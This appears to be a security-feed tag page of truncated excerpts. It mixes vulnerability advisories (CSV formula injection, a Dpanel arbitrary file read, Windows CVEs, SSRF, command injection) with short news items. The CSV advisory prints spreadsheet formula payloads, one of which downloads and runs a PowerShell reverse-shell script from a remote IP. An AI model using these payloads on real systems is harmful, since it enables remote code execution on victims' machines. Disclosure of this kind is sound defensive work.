#windows

### Summary Description: `CSV Injection` or `Formula Injection` is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text. ### Details A basic test for CSV Injection is using `SUM()` to add two numbers or open calc.exe​ using​ command: `=cmd|' /C calc'!A0​` The same method can be used to run arbitrary code on the victim's machine. For example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker's machine. *Payload*: > This is our payload and will be used in the vulnerable field during exploitation ``` =cmd|' /C powershell Invoke-WebRequest "http://52.172.182.242:7000/shell.ps1" -OutFile "$env:Temp\shell.ps1"; powershell -ExecutionPolicy Bypas...

### Summary Dpanel has an arbitrary file read vulnerability in the /api/app/compose/get-from-uri interface.Logged in to Dpanel ,this interface can be used to read arbitrary files. ### Details When a user logs into the administrative backend, this interface can read any files on the host/sever (given the necessary permissions), which may lead to system information leakage. The vulnerability lies in the GetFromUri function within the app/application/http/controller/compose.go file. The uri parameter submitted by the user in JSON format can be directly read and returned by os.ReadFile without proper security handling.   ### PoC ```text POST /api/app/compose/get-from-uri HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefo...

Amy (ahem, Special Agent Dale Cooper) shares lessons from their trip to the Olympic Peninsula and cybersecurity travel tips for your last-minute adventures.

Google has settled a lawsuit against YouTube for $30 million but did not admit collecting the data of minors for targeted advertising.

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Storage allows an unauthorized attacker to execute code over a network.

**What privileges could be gained by an attacker who successfully exploited this vulnerability?** An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

Improper verification of cryptographic signature in Windows Certificates allows an unauthorized attacker to perform spoofing over a network.

A new report from Red Canary reveals a clever Linux malware called DripDropper that exploits a flaw and…

Server-Side Request Forgery (SSRF) in eventmesh-runtime module in WebhookUtil.java on windows\linux\mac os e.g. allows the attacker can abuse functionality on the server to read or update internal resources. Users are recommended to upgrade to version 1.12.0 or use the master branch, which fixes this issue.

The EVE X1 server suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'passwd' HTTP POST parameter in /ajax/php/login.php script.